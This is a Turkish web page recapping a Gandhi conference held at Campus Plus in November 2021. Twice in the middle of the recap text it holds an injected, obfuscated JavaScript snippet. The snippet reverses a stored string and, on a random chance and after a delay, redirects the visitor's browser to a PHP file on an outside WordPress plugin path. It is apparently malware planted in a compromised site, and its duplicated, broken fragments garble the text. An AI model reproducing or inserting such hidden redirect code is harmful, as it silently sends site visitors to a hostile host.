fbpx
En Yakın Etkinlikler
1636448407967

Sevgi ve Gerçek Olanın Peşinde…

05.11.2021 Cuma akşamı, Campus Plus’ta Gandhi Konferansı, Eray Öztürk’ün sunumu ile gerçekleştirilmiştir.

Hem kendisi hem de insanlar için sevgi ve gerçek olanın peşinden yaşanan bir hayat Gandhi’nin hayatı. İşte biz de bu konferansımızda kendi yaşamından ilham almaya çalıştık. Kendisini sadeleştirmek ve gerçeğin arayıcısına dönüşmek için Gandhi bir filozof edasıyla kendisiyle hep çalıştı. Kendi tutkularına karşı durmaksızın mücadele etti. Sonunda kendisi ve insanlar için pek çok iyiliğe ve güzelliğe sebep oldu.

$NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to”>

$NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to”>Tüm katılımcılarımıza katılımları için teşekkür eder ve sonraki etkinliklerimizde yeniden buluşmayı dileriz.

Bakmak İsteyebilirsiniz...

IMG-20220107-WA0035

Sembollerin Ülkesi Antik Mısır’a Yolculuk

Eylül ayından bu yana iki haftada bir Campus Plus’ta yapmakta olduğumuz konferanslarımzdan Antik Mısır Bilgeliği ...

Bir Cevap Yazın